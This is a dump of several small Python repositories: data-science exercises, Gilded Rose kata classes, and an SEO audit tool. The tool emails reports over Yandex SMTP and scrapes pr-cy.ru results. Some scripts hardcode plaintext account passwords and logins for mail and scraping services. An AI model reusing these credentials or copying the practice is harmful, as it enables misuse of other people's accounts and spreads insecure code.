TotalTestTime = TotalTestTime + int(s[4])\n passcount = passcount + 1;\n passtesttime = passtesttime + int(s[4])\n alltesttime = alltesttime + TotalTestTime\n alltestcount = alltestcount + passcount+failcount\n allpasscount = allpasscount + passcount\n allfailcount = allfailcount + failcount\n allpasstesttime = allpasstesttime + passtesttime\n allfailtesttime = allfailtesttime + failtesttime\n #print(\",\",failcount,\",\",passcount,\",\",passcount+failcount,\",\",TotalTestTime)\n #print(\"{:s},{:d},{:d},{:d},{:d}\".format(filename[:-4],failcount,passcount,passcount+failcount,TotalTestTime))\n df.loc[len(df)] = 
[filename[:-4],failcount,passcount,passcount+failcount,TotalTestTime]\n\nprint(\"Total Units Tested \",unitcount)\nprint(\"Total Tests performed \",alltestcount)\nprint(\"Total Passes \",allpasscount)\nprint(\"Total Fails \",unitcount - allpasscount)\nprint(\"Total Test Time \",alltesttime)\nprint(\"Average test time {:0.2f}s \".format(alltesttime/(alltestcount)))\nprint(\"Average test time passed units {:0.2f}s \".format(allpasstesttime/(allpasscount)))\nprint(\"Average test time failed units {:0.2f}s \".format(allfailtesttime/(allfailcount)))\nprint(\"Percent passed units {:2.1f}% \".format(100*allpasscount/(unitcount) ))\nprint(\"Testing Efficiency {:2.1f}%\".format(100*allpasstesttime/(alltesttime)))\nprint(\"Real average test time per unit {:0.2f}\".format(alltesttime/unitcount) )\n\nsavefilename = \"Stats\" + testdate.replace('/','_') + \".csv\"\ndf.to_csv(savefilename)\n" } ]
2
lakshmanraob/PythonDataScience
https://github.com/lakshmanraob/PythonDataScience
8c125d8d4c6be0354622aafc0970fc42659b557f
8fa7947ec1b0febecbebcf5c47c18c614dfaf35c
46673151c2c16fd8f70313682336419bc1c9fc96
refs/heads/master
2021-01-20T14:59:43.833984
2018-12-22T01:53:02
2018-12-22T01:53:02
90,701,932
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7322404384613037, "alphanum_fraction": 0.7404371500015259, "avg_line_length": 25.14285659790039, "blob_id": "2f15f366f9c80e79726d5378f0d9203a998afc96", "content_id": "9359f68056ceae1c1cdcc78bf68f5554be8b8ae5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 732, "license_type": "no_license", "max_line_length": 88, "num_lines": 28, "path": "/DSExp/Classifier.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nimport sklearn.metrics as metrics\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\niris = load_iris()\n\nX = iris.data\ny = iris.target\nscore = []\n\n# get target_names and display for the prediction\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=4)\n\nnarray = np.arange(1, 26)\nfor n in narray:\n knn = KNeighborsClassifier(n_neighbors=n)\n knn.fit(X_train, y_train)\n y_predict = knn.predict(X_test)\n score.append(metrics.accuracy_score(y_test, y_predict))\n\nplt.plot(narray, score)\nplt.xlabel(\"Value of K\")\nplt.ylabel(\"prediction accuracy\")\n" }, { "alpha_fraction": 0.7551299333572388, "alphanum_fraction": 0.7667578458786011, "avg_line_length": 25.581817626953125, "blob_id": "fef1bdd5f9da3e8cb39346636c7b6eaa285d0607", "content_id": "9d1dcf1801745de517a9539ce3c0cfead68711a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 116, "num_lines": 55, "path": "/HousingPrices/house_predict_rfr.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 19 14:08:39 2018\n\n@author: labattula\n\"\"\"\n\n\"\"\"\nImporting neccessary 
libraries\n\"\"\"\n\"\"\"\n RandomForestRegressor choosen to incluse many shallow trees and compare the results\n and give the predicted value\n\"\"\"\nfrom sklearn.ensemble import RandomForestRegressor\n\"\"\"\nused train_test_split method to split data to train and build the model and predict the \noutcome basing and compare the same with the actual value \n\"\"\"\nfrom sklearn.model_selection import train_test_split\n\"\"\"\nmean_absolute_error will be used for comaring the predicted value with the absolute value.\nIn lay man terms, it is a comparision of one technique of measurement versus an alternative technique of measurement\n\"\"\"\nfrom sklearn.metrics import mean_absolute_error\n\nimport pandas as pd\n\nmelborne_file_path = '/Users/labattula/Documents/lakshman/ML/PythonDataScience/HousingPrices/melb_data.csv'\n\nmelbourne_data = pd.read_csv(melborne_file_path)\n\nmelbourne_columns = melbourne_data.columns\n\nmelbourne_data = melbourne_data.dropna(axis=0)\n\ny = melbourne_data.Price\n\nprint(melbourne_data.columns)\nfeatures = ['Rooms','Bathroom','Landsize','Lattitude','Longtitude']\n\nX = melbourne_data[features]\n\ntrain_X,val_X,train_y,val_y = train_test_split(X,y,random_state=1)\n\nmodel = RandomForestRegressor(random_state=1)\n\nmodel.fit(train_X,train_y)\n\nval_predict = model.predict(val_X)\n\nmae = mean_absolute_error(val_y,val_predict)\n\nprint(mae)\n" }, { "alpha_fraction": 0.6591151356697083, "alphanum_fraction": 0.6663113236427307, "avg_line_length": 38.03125, "blob_id": "ccf5ae4da1a7f0fc61cca915788652ab97457311", "content_id": "81fb03991f626ff77e101833a894cc9a392cb3b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3752, "license_type": "no_license", "max_line_length": 108, "num_lines": 96, "path": "/HousingPrices/imputation.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 
20 11:47:29 2018\n\n@author: labattula\n\"\"\"\n\n# creating the Imputation\n\nimport pandas as pd\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\nmelbourne_file_path = \"/Users/labattula/Documents/lakshman/ML/PythonDataScience/HousingPrices/melb_data.csv\"\nmelbourne_data = pd.read_csv(melbourne_file_path)\n\n#print(melbourne_data.head())\n\n# price data taken in seperate data frame, this will be our target value\nmlb_data_price = melbourne_data.Price\n#taking the rest of the values except price\nmlb_price_predictors = melbourne_data.drop(['Price'],axis=1)\n\n#selecting only the numerice data for applying the imputation\nmlb_numeric_data_frame = mlb_price_predictors.select_dtypes(exclude=['object'])\n\nX_train,X_test,y_train,y_test = train_test_split(mlb_numeric_data_frame,\n mlb_data_price,\n train_size=0.7,\n test_size=0.3,\n random_state=1)\n\n\n# for getting mean absolute error basing on the RainForestRegressor \ndef score_dataset(X_train,X_test,y_train,y_test):\n model = RandomForestRegressor()\n model.fit(X_train,y_train)\n preds = model.predict(X_test)\n return mean_absolute_error(y_test,preds)\n\n########################################################\n# getting the columns which contains nan in their cells\ncols_for_drop = [col for col in X_train.columns\n if X_train[col].isnull().any()]\n\nreduced_X_train = X_train.drop(cols_for_drop,axis=1)\nreduced_X_test = X_test.drop(cols_for_drop,axis=1)\n\nprint(\"1. 
droping the columns with value as nan\")\nprint(score_dataset(reduced_X_train,reduced_X_test,y_train,y_test))\n\n########################################################\n# initializing the Imputer\nmy_imputer = Imputer()\n\n# this will replace the nan value with X_train average value\n# need to recast the ndArray back to Pandas dataFrame\n# the ndArrays will not be structured like Pandas DataFrame\n#imputed_X_train = my_imputer.fit_transform(X_train)\nimputed_X_train = pd.DataFrame(my_imputer.fit_transform(X_train))\nimputed_X_test = pd.DataFrame(my_imputer.transform(X_test))\n\nprint(\"2. Appying the imputation on the X_train and X_test\")\nprint(score_dataset(imputed_X_train,imputed_X_test,y_train,y_test))\n\n########################################################\n# process of notifying to the mode that these values are missing, so that the\n# model can take the right predictions\nprint(\"Extension to the imputation\")\nimputed_X_train_plus = X_train.copy()\nimputed_X_test_plus = X_test.copy()\n\n# getting the columns which hold nan in their cells\ncols_with_na_for_imputation = [col for col in X_train.columns\n if X_train[col].isnull().any()]\n\nfor col in cols_with_na_for_imputation:\n imputed_X_train_plus[col+\"_was_missing\"] = imputed_X_train_plus[col].isnull()\n imputed_X_test_plus[col+\"_was_missing\"] = imputed_X_test_plus[col].isnull()\n \next_imputer = Imputer()\n\n# this will impute the data\nimputed_X_train_plus = pd.DataFrame(ext_imputer.fit_transform(imputed_X_train_plus))\nimputed_X_test_plus = pd.DataFrame(ext_imputer.fit_transform(imputed_X_test_plus))\n\nprint(\"3. 
Applying the col missing valraible to the data\")\nprint(score_dataset(imputed_X_train_plus,imputed_X_test_plus,y_train,y_test))\n\n\"\"\"\nIt is observed that over the period of time, if keep running the above program, the \neffeieciency of the result is flutuating between approach 2 and 3\n\"\"\"\n\n\n\n\n\n" }, { "alpha_fraction": 0.7016072869300842, "alphanum_fraction": 0.7190775871276855, "avg_line_length": 28.224489212036133, "blob_id": "7bc4d2bfb31a30a4e80ffa94274514a797d50334", "content_id": "3e8f067d5c15aed8013c70b4e68ac5305b10bd29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1431, "license_type": "no_license", "max_line_length": 107, "num_lines": 49, "path": "/HousingPrices/house_predict_DTR.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\nimport pandas as pd\n\nmelboune_file_path = '/Users/labattula/Documents/lakshman/ML/PythonDataScience/HousingPrices/melb_data.csv'\nmelbourne_data = pd.read_csv(melboune_file_path)\n\nmelbourne_columns = melbourne_data.columns\n\nmelbourne_data = melbourne_data.dropna(axis=0)\n\ny = melbourne_data.Price\n\nprint(melbourne_data.columns)\nfeatures = ['Rooms','Bathroom','Landsize','Lattitude','Longtitude']\n\nX = melbourne_data[features]\n\ndef get_train_data(random_state):\n train_X,val_X,train_y,val_y = train_test_split(X,y,random_state=random_state)\n return train_X,val_X,train_y,val_y\n\nmax_leaf_nodes = [5,10,25,50,100,1000,2000,5000]\n\ndef get_mae(max_leaf):\n random_state = 1\n model = DecisionTreeRegressor(max_leaf_nodes = max_leaf,random_state=random_state)\n train_X,val_X,train_y,val_y = train_test_split(X,y,random_state=random_state)\n model.fit(train_X,train_y)\n 
val_predict = model.predict(val_X)\n mae = mean_absolute_error(val_y,val_predict)\n return (mae)\n\nd = []\nfor leaf_node in max_leaf_nodes:\n cal_mae = get_mae(leaf_node)\n d.append((leaf_node,cal_mae))\ndf = pd.DataFrame(d,columns=('leaf_node','mae'))\nmae_min = df.min().mae\nprint(df.loc[df['mae'] == df.min().mae])" }, { "alpha_fraction": 0.7254335284233093, "alphanum_fraction": 0.7312138676643372, "avg_line_length": 25.615385055541992, "blob_id": "e035addca1ef8af08e4e6d9a55988a1a5f88425d", "content_id": "ef0ad43616abebe07cfc08fc99f036e4ef496ee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 346, "license_type": "no_license", "max_line_length": 93, "num_lines": 13, "path": "/DSExp/startds.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\n\nfrom pandas import Series, DataFrame\n\nfile = '/Users/labattula/Documents/Lakshman/Future-ML/MyDS/matches.csv'\n\nDF_matches = pd.read_csv(file)\n# print DF_matches.head()\n\nteam_name = \"Royal Challengers Bangalore\"\n\nprint DF_matches.loc[(DF_matches['team1'] == team_name) | (DF_matches['team2'] == team_name)]\n" }, { "alpha_fraction": 0.7648026347160339, "alphanum_fraction": 0.7680920958518982, "avg_line_length": 20.714284896850586, "blob_id": "8ac0fb2f1e2320c2b761b0f7948245ecba70de68", "content_id": "06fe8a5906601695b41b801584c5cfb4fea3e6fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/DSExp/trainTestSplit.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "from sklearn.cross_validation import train_test_split\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.datasets import load_iris\n\nimport sklearn.metrics as metrics\n\niris = 
load_iris()\n\nX = iris.data\ny = iris.target\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4)\n\nprint X_train.shape\nprint X_test.shape\n\nprint y_train.shape\nprint y_test.shape\n\nlogReg = LogisticRegression()\nlogReg.fit(X_train, y_train)\n\ny_log_pred = logReg.predict(X_test)\n\nprint \"logistic approach..\", metrics.accuracy_score(y_test, y_log_pred)\n" } ]
6
claumartin/gilded_rose
https://github.com/claumartin/gilded_rose
09f2b6164a19314bb879b50c4aebb22a37d3f8e9
9a6e6ca2c823558cd634a8ee9e25970f0e95304d
1ba117ff3369cbbb382a2883696ba55080c7838d
refs/heads/master
2020-06-28T01:53:47.120418
2019-08-01T20:16:23
2019-08-01T20:16:23
200,111,904
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5837838053703308, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 13.269230842590332, "blob_id": "a0925e66e2496730b0a5a39f77fd39f9f2fb1d3a", "content_id": "c79d51b599e53dfb7f8decca5d3a3f2a07ba9fb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 370, "license_type": "no_license", "max_line_length": 35, "num_lines": 26, "path": "/sulfuras.py", "repo_name": "claumartin/gilded_rose", "src_encoding": "UTF-8", "text": "from regularItem import RegularItem\n\n\nclass Sulfuras(RegularItem):\n\n def setSellIn(self):\n pass\n\n\n def updateQuality(self):\n pass\n\n\n\n\nif __name__ == '__main__':\n\n pato = Sulfuras('pato', 0, 80)\n\n assert pato.getName() == 'pato'\n\n pato.setSellIn()\n assert pato.getSellIn() == 0\n\n pato.updateQuality() \n assert pato.getQuality() == 80" }, { "alpha_fraction": 0.5922746658325195, "alphanum_fraction": 0.6151645183563232, "avg_line_length": 19.58823585510254, "blob_id": "b1c40cf1b7a71df4fa53b149f0420ef86d18596b", "content_id": "a5c12cd8ce571277ce5f7866810b3d2732716819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "no_license", "max_line_length": 101, "num_lines": 34, "path": "/gildedRose.py", "repo_name": "claumartin/gilded_rose", "src_encoding": "UTF-8", "text": "from sulfuras import Sulfuras\nfrom agedBrie import AgedBrie\nfrom backstage import Backstage\n\n\nclass GildedRose():\n\n def __init__(self, stock):\n self.stock = stock\n\n \n def getStock(self):\n return self.stock\n \n\n def updateStock(self):\n for item in self.stock:\n item.updateQuality()\n\n\n\n\nif __name__ == \"__main__\":\n \n\n # TEST CASES #\n\n stock = [Sulfuras('sulfuras', 10, 80), AgedBrie('agedBrie', 3, 4), Backstage('backstage', 5, 25)]\n tienda = GildedRose(stock)\n tienda.updateStock()\n\n assert tienda.getStock()[0].getQuality() == 80\n assert tienda.getStock()[0].getName() == 
\"sulfuras\"\n assert tienda.getStock()[0].getSellIn() == 10" }, { "alpha_fraction": 0.5052083134651184, "alphanum_fraction": 0.53125, "avg_line_length": 18.233333587646484, "blob_id": "4784c48d50f01c51cc4b6d8e0d2255e3cdf2329e", "content_id": "8272512b16664e3dee7c302f6f8b8fb049064926", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 576, "license_type": "no_license", "max_line_length": 36, "num_lines": 30, "path": "/backstage.py", "repo_name": "claumartin/gilded_rose", "src_encoding": "UTF-8", "text": "from regularItem import RegularItem\n\nclass Backstage(RegularItem):\n\n def updateQuality(self):\n \n if self.getSellIn() <= 5:\n self.quality += 3\n\n elif self.getSellIn() <= 10:\n self.quality += 2\n\n elif self.getSellIn() > 10:\n self.quality += 1\n \n else:\n self.quality = 0\n\n\nif __name__ == '__main__':\n\n pato = Backstage('pato', 20, 4)\n\n assert pato.getName() == 'pato'\n\n pato.setSellIn()\n assert pato.getSellIn() == 19\n\n pato.updateQuality() \n assert pato.getQuality() == 5" }, { "alpha_fraction": 0.5141955614089966, "alphanum_fraction": 0.5236592888832092, "avg_line_length": 17.705883026123047, "blob_id": "8dfe497624426156ba4be3d391fd6c1e146810fc", "content_id": "72537f8e5ceee711bc860960b4c520a2e908d50e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 317, "license_type": "no_license", "max_line_length": 83, "num_lines": 17, "path": "/item.py", "repo_name": "claumartin/gilded_rose", "src_encoding": "UTF-8", "text": "class Item:\n\n\n def __init__(self, name, sellIn, quality):\n self.name = name\n self.sellIn = sellIn\n self.quality = quality\n\n\n def __repr__(self):\n return '%s, %s, %s' % (self.getName(), self.getSellIn(), self.getquality())\n\n\n\nif __name__ == '__main__':\n\n pato = Item('pato', 20, 4)" } ]
4
jz36/megaindex-audit
https://github.com/jz36/megaindex-audit
124e16f4e5de585458acafeeeb2fd92a28bf2bff
a2d2b2448920da3cc5cff479c697bb907e559975
6e17d415c0c95d1e904bfc82aa96a23c68efcf8f
refs/heads/master
2021-01-01T05:12:19.388463
2017-07-27T06:56:29
2017-07-27T06:56:29
58,571,131
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7298524379730225, "alphanum_fraction": 0.7389330267906189, "avg_line_length": 25.727272033691406, "blob_id": "0d89e73f0a143fed77dd862e9edb325749eaa17e", "content_id": "9cdb56d01b0123a814f5694f749a036a637787f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 890, "license_type": "no_license", "max_line_length": 78, "num_lines": 33, "path": "/smtpproof.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "from smtplib import SMTP_SSL\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders as Encoders\nimport os\n\nfilepath = \"/home/jz36/Документы/chess/bBishop.png\"\nbasename = os.path.basename(filepath)\naddress = \"[email protected]\"\n\n# Compose attachment\npart = MIMEBase('application', \"octet-stream\")\npart.set_payload(open(filepath,\"rb\").read() )\nEncoders.encode_base64(part)\npart.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % basename)\npart2 = MIMEText('how are you?', 'plain')\n\n# Compose message\nmsg = MIMEMultipart()\nmsg['From'] = address\nmsg['To'] = '[email protected]'\nmsg['Subject'] = 'proof'\n\nmsg.attach(part2)\nmsg.attach(part)\n\n# Send mail\nsmtp = SMTP_SSL()\nsmtp.connect('smtp.yandex.ru')\nsmtp.login(address, 'rjcjq12utybq')\nsmtp.sendmail(address, '[email protected]', msg.as_string())\nsmtp.quit()" }, { "alpha_fraction": 0.6326370239257812, "alphanum_fraction": 0.6448705196380615, "avg_line_length": 36.47452926635742, "blob_id": "a9b88fbfd29685959991600e20fda63d65ddcd2b", "content_id": "29f83c2c208e205ee925bd3e20adf4efa41544c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15960, "license_type": "no_license", "max_line_length": 405, "num_lines": 373, "path": "/tryUI.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "from tkinter import 
*\nfrom tkinter.filedialog import *\nimport fileinput\n#import requests\nimport urllib.parse\nimport time\nfrom smtplib import SMTP_SSL\nfrom email.mime.multipart import MIMEMultipart\nfrom email.headerregistry import Address\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders as Encoders\nimport os\nfrom pdb import set_trace\n#from wkhtmltopdfwrapper import WKHtmlToPdf\nfrom weasyprint import HTML\nfrom selenium import webdriver\n\n\ndef indexSite(site, customerEmail, customerFIO):\n\tmethods = ('reindex_site', 'get_index')\n\n\tBASE_URL = 'http://api.megaindex.ru/?'\n\n\tparamsForReIndex = {\n\t\t'method': methods[0],\n\t\t'output': 'json',\n\t\t'mode': 'site',\n\n\t\t'url': site,\n\t\t'version_id': '1',\n\t\t'target': 'reindex',\n\t\t'count_page': '30'\n\t}\n\n\tfirstResponse = requests.get(BASE_URL, params=paramsForReIndex)\n\tfirstJson = firstResponse.json()\n\tprint(firstJson)\n\n\tparamsForGetIndex = {\n\t\t'method': methods[1],\n\n\t\t'url': site,\n\t\t'version_id': firstJson['version_id']\n\t}\n\n\ttime.sleep(300)\n\n\tsecondResponse = requests.get(BASE_URL, params=paramsForGetIndex)\n\tsecondJson = secondResponse.json()\n\n\tf = open('textJson.txt', 'w')\n\tf.write(str(secondJson))\n\tf.close()\n\n\tsubject = 'Аудит сайта ' + site\n\n\tmessage = \"Добрый день, \" + customerFIO + \". 
Провели аудит вашего сайта.\"\n\n\t#sendMail(customerEmail, subject, message)\n\ndef sendMail(emailTo, subject, msgText, fileAddr):\n\tfilepath = fileAddr\n\tbasename = os.path.basename(filepath)\n\taddress = \"[email protected]\"\n\n\t# Compose attachment\n\tpart = MIMEBase('application', \"octet-stream\")\n\tpart.set_payload(open(filepath,\"rb\").read() )\n\tEncoders.encode_base64(part)\n\tpart.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % basename)\n\tpart3 = MIMEBase('application', \"octet-stream\")\n\tpart3.set_payload(open(os.getcwd() + '/plan_rabot_po_saitu_na_god.xlsx',\"rb\").read() )\n\tEncoders.encode_base64(part3)\n\tpart3.add_header('Content-Disposition', 'attachment; filename=\"plan_rabot_po_saitu_na_god.xlsx\"')\n\tpart2 = MIMEText(msgText, 'plain')\n\n\t# Compose message\n\tmsg = MIMEMultipart()\n\tmsg['From'] = 'Михаил Юрьевич Бубновский <[email protected]>'\n\tmsg['To'] = emailTo\n\tmsg['Subject'] = subject\n\n\tmsg.attach(part2)\n\tmsg.attach(part)\n\tmsg.attach(part3)\n\n\t# Send mail\n\tsmtp = SMTP_SSL()\n\tsmtp.connect('smtp.yandex.ru')\n\tsmtp.login(address, 'biksileev')\n\tsmtp.sendmail(address, emailTo, msg.as_string())\n\tsmtp.quit()\n\ndef proof(event):\n\tprint('Start work!')\n\tindexSite(siteEntry.get(), emailEntry.get(), nameEntry.get())\n\tprint('Done!')\n\tsiteEntry.delete(0, len(siteEntry.get()))\n\temailEntry.delete(0, len(emailEntry.get()))\n\tnameEntry.delete(0, len(nameEntry.get()))\n\ndef proof2(event):\n\tgrabPRCY(op)\n\ndef grabPRCY(fileAddr):\n\tfrom grab import Grab\n\n\tdef clearStr( string ):\n\t\tif type(string) != type(None):\n\t\t\treturn string.replace('\\n','').replace('\\t','').replace('\\r','')\n\n\tg = Grab()\n\n\tg.go('https://id.pr-cy.ru/signup/login/')\n\t\t\t\n\tg.doc.set_input('login_email','[email protected]') \n\tg.doc.set_input('password','biksileev')\n\tg.doc.submit()\n\toutput = open('Finished.txt', 'w')\n\n\tj = 1\n\n\tphant = webdriver.PhantomJS()\n\n\tfor string in 
fileinput.input(fileAddr):\n\n\t\tcustomerList = string.split('\t')\n\n\t\tcustomerList[2] = clearStr(customerList[2])\n\n\t\tphant.get('https://a.pr-cy.ru/' + customerList[1])\n\n\t\ttime.sleep(60)\n\n\t\tg.go('https://a.pr-cy.ru/' + customerList[1])\n\n\t\tnewList = g.css_list('.is')\n\n\t\tprint(len(newList))\n\n\t\ti = 0\n\n\t\tf = open('audit/' + customerList[1] + '.html','w')\n\t\tf.write('''<!DOCTYPE html>\n\t<html>\n\t\t<head>\n\t\t\t<meta charset=\"utf-8\" />\n\t\t\t<link rel='stylesheet' href=\"style.css\">\n\t\t</head>\n\t\t<body>\n\t\t\t<div id=\"head\">\n\t\t\t\t<img src=\"biksileev.jpg\"/>\n\t\t\t\t<h1>Технический аудит сайта http://''' + customerList[1] + '''</h1>\n\t\t\t\t<p>Для чёткого понимания текущего технического состояния сайта http://''' + customerList[1] + '''\nбыл проведён полный технический аудит, результаты которого представлены ниже в виде таблицы.</p></div>''')\n\t\tf.write('<div>')\n\t\tf.write('<table>')\n\t\tf.write('<thead><tr><td colspan=\"2\">Технический аудит</td></tr></thead>')\n\t\tf.write('<tbody>')\n\t\tf.write('<tr><td>Критерий</td><td>Текущее состояние</td></tr>')\n\n\t\tfor name in newList:\n\t\t\tif True: #not('Обратные ссылки' in name.cssselect('.info-test')[0].text) or not('Аналитика' in name.cssselect('.info-test')[0].text):\n\t\t\t\tif len(name.cssselect('.info-test')) > 0:\n\t\t\t\t\tprint(name.cssselect('.info-test')[0].text)\n\t\t\t\t\tif (('Описание страницы' or 'Скриншот сайта на смартфоне') in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\tf.write('</table></div><div class=\"pageBreak\"><table>')\n\t\t\t\t\t\tf.write('<tr ><td class=\"left\">')\n\t\t\t\t\telse:\n\t\t\t\t\t\tf.write('<tr><td class=\"left\">')\n\t\t\t\t\tf.write(name.cssselect('.info-test')[0].text)\n\t\t\t\t\tf.write('</td>')\n\t\t\t\t\tf.write(' ')\n\t\t\t\t\tif len(name.cssselect('.content-test')) > 0:\n\t\t\t\t\t\tif (len(clearStr(name.cssselect('.content-test')[0].text)) > 0):\n\t\t\t\t\t\t\tif 
(name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tif (len(name.cssselect('.content-test')[0].cssselect('a')) > 0): \n\t\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].text) + clearStr(name.cssselect('.content-test')[0].cssselect('a')[0].text))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')) > 0):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write('<img src=\"http://' + name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')[0].get('src')[2:] + '\">')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif(('Facebook' in name.cssselect('.info-test')[0].text) or ('ВКонтакте' in name.cssselect('.info-test')[0].text) or ('Google+' in name.cssselect('.info-test')[0].text) or ('Twitter' in name.cssselect('.info-test')[0].text)):\n\t\t\t\t\t\t\tif(name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\t\tf.write('Ссылка на страницу найдена.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\t\telif(name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\t\tf.write('Ссылка на страницу не 
найдена.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif ((len(name.cssselect('.content-test')[0].cssselect('a')) > 0)):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('a')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('p')) > 0):\n\t\t\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('p')\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tfor paragraph in newList2:\n\t\t\t\t\t\t\t\tf.write(clearStr(paragraph.text))\n\t\t\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')) > 0):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif 